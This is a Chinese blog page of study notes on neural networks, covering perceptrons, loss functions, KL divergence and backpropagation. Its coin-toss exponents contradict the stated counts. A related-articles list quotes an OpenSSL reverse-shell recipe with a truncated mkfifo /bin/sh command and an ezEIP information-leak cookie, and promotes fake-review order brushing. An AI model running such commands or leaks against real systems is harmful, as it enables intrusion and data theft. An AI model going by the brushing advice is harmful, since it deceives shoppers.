当前位置: 首页 > news >正文

关于神经网络的思考

关于感知机

感知机(Perceptron)和神经网络(Neural Network)之间有一定的关系,可以说感知机是神经网络的一个基本组成单元。

  • 感知机

    • 感知机是一种简单的二分类线性分类器。
    • 它接受多个输入,对每个输入施加权重,然后将它们相加。这个总和会经过一个激活函数(通常是阶跃函数)得到输出。
    • 如果输出超过某个阈值,它将被分类为一类,否则分类为另一类。
    • 感知机可以用于解决线性可分的问题,但不能解决线性不可分的问题。

感知机有两部分,一是线性函数,二是激活函数:

其中线性函数如果在二维中就是一条直线f=wx+b把两种类别分开,在三维就是一个平面...

单个感知机能处理与或非但不能处理异或:

因为异或可以用与或非表示出来,故要处理异或问题可以用多层感知机: 

  • 神经网络

    • 神经网络是一个更加复杂的模型,由许多层次的神经元组成。
    • 每个神经元接受多个输入,并为每个输入分配一个权重。然后将所有加权输入相加,通过激活函数处理得到输出。
    • 神经网络可以包含多个层(输入层、隐藏层、输出层),其中隐藏层其实就是多层感知机,可以处理更加复杂的非线性关系。

关于损失函数

最小二乘法

假设x_{i}是真实结果,y_{i}是预测结果,最直观的想法就是去求它们之间的差值,让差值尽可能的小,即让预测结果尽可能接近真实结果。

但是用这个绝对值可能会不可导,故采用平方的形式衡量这种差距,“最小”即min“二乘”即二次方。

极大似然估计法

知道结果,由结果去反推造成结果的概率模型时的估计方法。

比如10每硬币抛出来7个正面3个反面,如果算出的概率模型有0.1:0.9、0.7:0.3和0.8:0.2,其中0.7:0.3的概率模型下发生这件事的概率为0.7^5*0.3^3,概率是最大的即“似然”,那么就“估计”这种概率模型就是真实抛硬币的概率模型。

如果事件只有两种情况,那么符合伯努利分布。

交叉熵

熵是衡量一个系统不确定性的多少即信息量。

假如有一个概率系统P,那么它的熵就是对这个系统的信息量求期望。

KL散度

KL散度即相对熵,相对指的是两个概率系统。

D(P||Q)和D(Q||P)是不等价的,D(P||Q)表示以P为基准,它们信息量相差多少。

由整理的结果可见,第一项是交叉熵;第二项是P的系统熵,是定值。

引理:KL散度大于等于0,当P=Q时为0。

要让两个概率系统接近,即最小化交叉熵->损失函数。

由于P的熵是定值求梯度(即函数偏导)为0,故其实KL散度作损失函数等价于交叉熵作损失函数。

假设事件只有两种情况,交叉熵可写为:

可以发现,交叉熵和极大似然估计法的式子形式一样(含义不同)。

关于梯度下降

调整参数(比如权重w和偏置b)的策略是反向传播,梯度下降是反向传播的一种方法,除此之外还有牛顿法、冲量法...

正向传播就是信息在一层层的感知机下传递下去。

反向传播就是把偏差传递到各个参数上,根据参数对偏差的“贡献”大小作相应的调整多少。

(蕴含的贪心思想:优先调整那些对最后结果有重大影响的参数)

其中J表示由损失函数算出来的偏差,绿色部分代表该感知机因对最后结果的“贡献”大小所承担的“责任”的多少(浅绿部分是参数,深绿部分是上一层造成的偏差,回传给上一层)。

上面直观的理解图的偏差是用数值加法,实际是用向量的加法进行分配,由于偏差值是没有方向的,所以还需要找到一个确定的方向->梯度的方向就是向量的方向。准确来说是梯度的反方向,因为梯度的方向是数值增加最快的方向,其反方向才是数值减小最快的方向。

相关文章:

关于神经网络的思考

关于感知机 感知机(Perceptron)和神经网络(Neural Network)之间有一定的关系,可以说感知机是神经网络的一个基本组成单元。 感知机: 感知机是一种简单的二分类线性分类器。它接受多个输入,对每…...

CodeForces每日好题10.14

给你一个字符串 让你删除一些字符让它变成一个相邻的字母不相同的字符串,问你最小的删除次数 以及你可以完成的所有方/案数 求方案数往DP 或者 组合数学推公式上面去想,发现一个有意思的事情 例如1001011110 这个字符串你划分成1 00 1 0 1111 0 每…...

Python Django 之连接 Mysql 数据库详解

文章目录 1 概述1.1 Mysql 下载和安装1.2 菜单目录 2 ORM 框架2.1 连接 Mysql 模块:mysqlclient2.2 创建数据库2.3 连接 Mysql2.4 创建表2.5 增删改查 3 扩展3.1 ERROR:2026, SSL connection error: unknown error number 1 概述 1.1 Mysql 下载和安装 …...

Java设计模式:Callback

介绍 回调(Callback)是一种设计模式,在这种模式中,一个可执行的代码被作为参数传递给其他代码,接收方的代码可以在适当的时候调用它。 在真实世界的例子中,当我们需要在任务完成时被通知时,我…...

年底旺季,Shopee、Lazada如何通过测评补单技术打造产品权重收割流量

当前Shopee和Lazada平台的主要推广方式仍然以广告为主,毕竟这是平台的主要收入来源之一。然而,由于近年来大量卖家涌入东南亚市场,导致卖家之间的竞争日趋激烈。高额的广告投入并不能带来预期的效果,因此越来越多的卖家开始自学测…...

CentOS 7 安装 MySQL8.0

由于centOS7中默认安装了 MariaDB , 需要先进行卸载 # 查看版本 rpm -qa | grep mariadb # 卸载 rpm -e --nodeps 文件名 # 查看是否卸载干净 rpm -qa | grep mariadb安装wget: yum -y install wget进入/usr/local/下: cd /usr/local/新建mysqlrpm文…...

C# 往多线程传递安全参数的方法

在C#构造一个线程时,要向其传递一个函数,这个函数可以试简单的无参函数,也可以是参数为Object类型的函数,但是由于参数类型为Object,因此编译器无法实行类型检查,看下面的例子: class Program{…...

Java之SPI

Java的SPI(Service Provider Interface)是一种面向接口编程的机制,用于实现组件之间的解耦和扩展。通过SPI机制,我们可以定义接口,并允许第三方提供不同的实现,从而实现可插拔、可扩展的架构。 SPI讲解 它…...

【数据结构】算法的空间复杂度

🦄个人主页:修修修也 🎏所属专栏:数据结构 ⚙️操作环境:Visual Studio 2022 算法空间复杂度的定义 算法的时间复杂度和空间复杂度是度量算法好坏的两个重要量度,在实际写代码的过程中,我们完全可以用空间来换时间,比如说,我们要判断某某年是不是闰年,大…...

恢复Windows 11经典右键菜单:一条命令解决显示更多选项问题

恢复Windows 11经典右键菜单:一条命令解决显示更多选项问题 恢复Windows 11经典右键菜单:一条命令解决显示更多选项问题为什么改变?恢复经典右键菜单 我是将军我一直都在,。! 恢复Windows 11经典右键菜单:一…...

Android:事件分发机制(二)

这篇主要是第一篇回顾之后,补充一些上一篇没写到的两个点。 第一个的切入点是这个。【处理层叠的view,想要执行下一层的view的点击事件】其背后的原理。 处理层叠的view,要执行下一层的view的点击事件 我们知道,方法是将上一层的…...

vue2时间处理插件——dayjs

在vue时间处理上有很多的方法和实现,可以自己实现,但是效率不高,所以,在框架开发中我们一般不会手写,一般是使用集成的第三方插件来解决我们的问题,在vue3中大家一般都使用Moment.js来处理,所以…...

软考 系统架构设计师系列知识点之软件质量属性(6)

接前一篇文章:软考 系统架构设计师系列知识点之软件质量属性(5) 所属章节: 第8章. 系统质量属性与架构评估 第2节. 面向架构评估的质量属性 相关试题 7. 某公司欲开发一个在线教育平台。在架构设计阶段,公司的架构师…...

Python6-wxPython库

Python6-wxPython库 1.wxPython库2.窗口程序2.1 简单的窗口程序2.2 自定义窗口类2.3 面板与静态文本2.4 事件处理 3.布局管理器3.1 盒子布局管理 4.控件4.1 文本输入框4.2 多选框与单选框4.3 列表控件4.4 静态图片 1.wxPython库 官方文档健全:https://docs.wxpytho…...

使用OpenSSL的反弹shell

1、攻击机生成证书&#xff1a; openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes2、攻击机开启服务 openssl s_server -quiet -key key.pem -cert cert.pem -port 803、靶机连接命令 mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1…...

竞赛选题 深度学习OCR中文识别 - opencv python

文章目录 0 前言1 课题背景2 实现效果3 文本区域检测网络-CTPN4 文本识别网络-CRNN5 最后 0 前言 &#x1f525; 优质竞赛项目系列&#xff0c;今天要分享的是 &#x1f6a9; **基于深度学习OCR中文识别系统 ** 该项目较为新颖&#xff0c;适合作为竞赛课题方向&#xff0c;…...

ezEIP信息泄露

漏洞描述 ezEIP存在信息泄露漏洞&#xff0c;通过遍历Cookie中的参数值获取敏感信息 漏洞复现 漏洞Url为 /label/member/getinfo.aspx访问时添加Cookie&#xff08;通过遍历获取用户的登录名电话邮箱等信息&#xff09; WHIR_USERINFORwhir_mem_member_pid1;漏洞证明&…...

02.机器学习原理(复习)

目录 机器学习的本质机器学习的类型Regression/回归Classification/分类Structured Learning/结构化学习 ML的三板斧设定范围设定标准监督学习半监督学习其他 达成目标小结达成目标设定标准设定范围 部分截图来自原课程视频《2023李宏毅最新生成式AI教程》&#xff0c;B站自行搜…...

电源集成INN3270C-H215-TL、INN3278C-H114-TL、INN3278C-H215-TL简化了反激式电源转换器的设计和制造。

一、概述 InnoSwitch™3-CP系列IC极大地简化了反激式电源转换器的设计和制造&#xff0c;特别是那些需要高效率和/或紧凑尺寸的产品。InnoSwitch3-CP系列将初级和次级控制器以及安全额定反馈集成到单个IC中。 InnoSwitch3-CP系列器件集成了多种保护功能&#xff0c;包括线路过…...

UE4和C++ 开发--HUD类

HUD 平视显示器(Head Up Display),简称HUD。在蓝图中是指在屏幕上面绘制的二维物体。 1. 创建HUD 打开蓝图编辑器&#xff0c;创建一个蓝图类&#xff0c;搜索HUD&#xff0c;选择并命名BP_HUD。 2. 开始绘制 打开事件列表&#xff0c;右键搜索 EventReceive Draw HUD。有两…...

iOS 26 携众系统重磅更新,但“苹果智能”仍与国行无缘

美国西海岸的夏天&#xff0c;再次被苹果点燃。一年一度的全球开发者大会 WWDC25 如期而至&#xff0c;这不仅是开发者的盛宴&#xff0c;更是全球数亿苹果用户翘首以盼的科技春晚。今年&#xff0c;苹果依旧为我们带来了全家桶式的系统更新&#xff0c;包括 iOS 26、iPadOS 26…...

Leetcode 3576. Transform Array to All Equal Elements

Leetcode 3576. Transform Array to All Equal Elements 1. 解题思路2. 代码实现 题目链接&#xff1a;3576. Transform Array to All Equal Elements 1. 解题思路 这一题思路上就是分别考察一下是否能将其转化为全1或者全-1数组即可。 至于每一种情况是否可以达到&#xf…...

Docker 运行 Kafka 带 SASL 认证教程

Docker 运行 Kafka 带 SASL 认证教程 Docker 运行 Kafka 带 SASL 认证教程一、说明二、环境准备三、编写 Docker Compose 和 jaas文件docker-compose.yml代码说明&#xff1a;server_jaas.conf 四、启动服务五、验证服务六、连接kafka服务七、总结 Docker 运行 Kafka 带 SASL 认…...

【SpringBoot】100、SpringBoot中使用自定义注解+AOP实现参数自动解密

在实际项目中,用户注册、登录、修改密码等操作,都涉及到参数传输安全问题。所以我们需要在前端对账户、密码等敏感信息加密传输,在后端接收到数据后能自动解密。 1、引入依赖 <dependency><groupId>org.springframework.boot</groupId><artifactId...

渲染学进阶内容——模型

最近在写模组的时候发现渲染器里面离不开模型的定义,在渲染的第二篇文章中简单的讲解了一下关于模型部分的内容,其实不管是方块还是方块实体,都离不开模型的内容 🧱 一、CubeListBuilder 功能解析 CubeListBuilder 是 Minecraft Java 版模型系统的核心构建器,用于动态创…...

【git】把本地更改提交远程新分支feature_g

创建并切换新分支 git checkout -b feature_g 添加并提交更改 git add . git commit -m “实现图片上传功能” 推送到远程 git push -u origin feature_g...

CMake控制VS2022项目文件分组

我们可以通过 CMake 控制源文件的组织结构,使它们在 VS 解决方案资源管理器中以“组”(Filter)的形式进行分类展示。 🎯 目标 通过 CMake 脚本将 .cpp、.h 等源文件分组显示在 Visual Studio 2022 的解决方案资源管理器中。 ✅ 支持的方法汇总(共4种) 方法描述是否推荐…...

精益数据分析(97/126):邮件营销与用户参与度的关键指标优化指南

精益数据分析&#xff08;97/126&#xff09;&#xff1a;邮件营销与用户参与度的关键指标优化指南 在数字化营销时代&#xff0c;邮件列表效度、用户参与度和网站性能等指标往往决定着创业公司的增长成败。今天&#xff0c;我们将深入解析邮件打开率、网站可用性、页面参与时…...

HDFS分布式存储 zookeeper

hadoop介绍 狭义上hadoop是指apache的一款开源软件 用java语言实现开源框架&#xff0c;允许使用简单的变成模型跨计算机对大型集群进行分布式处理&#xff08;1.海量的数据存储 2.海量数据的计算&#xff09;Hadoop核心组件 hdfs&#xff08;分布式文件存储系统&#xff09;&a…...

基于TurtleBot3在Gazebo地图实现机器人远程控制

1. TurtleBot3环境配置 # 下载TurtleBot3核心包 mkdir -p ~/catkin_ws/src cd ~/catkin_ws/src git clone -b noetic-devel https://github.com/ROBOTIS-GIT/turtlebot3.git git clone -b noetic https://github.com/ROBOTIS-GIT/turtlebot3_msgs.git git clone -b noetic-dev…...